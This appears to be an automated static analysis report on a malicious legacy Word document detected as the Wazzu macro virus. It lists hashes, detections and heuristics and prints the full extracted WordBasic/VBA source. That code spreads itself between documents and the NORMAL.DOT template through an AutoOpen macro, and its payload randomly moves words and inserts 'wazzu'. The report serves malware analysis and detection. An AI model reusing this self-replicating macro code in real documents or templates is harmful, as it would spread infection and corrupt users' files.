Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7398736f5394f6c…

MALICIOUS

Office (OLE)

80.0 KB Created: 1997-10-01 07:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-10-03
MD5: 839fe1e8097dd5c92171f1e47203f677 SHA-1: 2a99cac48c662af431f70a26c8f7020ef8216dd9 SHA-256: d7398736f5394f6c448800c7641c952634a03dcb312898c8f999b6b596a020e5
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample exhibits characteristics of legacy WordBasic macro viruses, including the presence of an AutoOpen macro and specific markers. The VBA code appears to obfuscate its functionality by manipulating document content and potentially preparing to execute a payload, as indicated by the ClamAV detections 'Doc.Trojan.Wazzu-47' and 'Doc.Trojan.Wazzu-11'. The macro's primary purpose seems to be related to payload delivery or execution, aligning with a spearphishing attachment attack vector.

Heuristics 4

  • ClamAV: Doc.Trojan.Wazzu-47 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-47
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "autoOpen"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1921 bytes
SHA-256: ecfadf9cb00df27d2d2d1251e1b3013a786164040e854a0ca7ce76a197f29c77
Detection
ClamAV: Doc.Trojan.Wazzu-11
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoOpen"

Public Sub MAIN()
Dim fileMacro$
Dim globMacro$
Dim MacroFile$
    On Error GoTo -1: On Error GoTo errCaught
        
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
    WordBasic.CurValues.FileSummaryInfo dlg

    fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
    globMacro$ = "Global:autoOpen"
    MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))

    If MacroFile$ = "NORMAL.DOT" Then
        WordBasic.MacroCopy globMacro$, fileMacro$
        WordBasic.FileSaveAs Format:=1
    Else
        WordBasic.MacroCopy fileMacro$, globMacro$
    End If

    Payload

GoTo bye
errCaught:

bye:
    On Error GoTo -1: On Error GoTo 0

End Sub

Private Sub Payload()
Dim i
Dim selWord$
    For i = 1 To 3
        If Rnd() < 0.2 Then
            RndWord
            WordBasic.SelectCurWord
            selWord$ = WordBasic.[Selection$]()
            WordBasic.DeleteWord

            RndWord
            WordBasic.Insert selWord$ + " "
        End If
    Next

    If Rnd() < 0.25 Then
        RndWord
        WordBasic.Insert "wazzu "
        WordBasic.StartOfDocument
    End If

End Sub

Private Sub RndWord()
Dim wordNum
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.DocumentStatistics(False)
    WordBasic.CurValues.DocumentStatistics dlg

    wordNum = WordBasic.Int(Rnd() * WordBasic.Val(dlg.Words))
    WordBasic.StartOfDocument
    WordBasic.WordRight wordNum
End Sub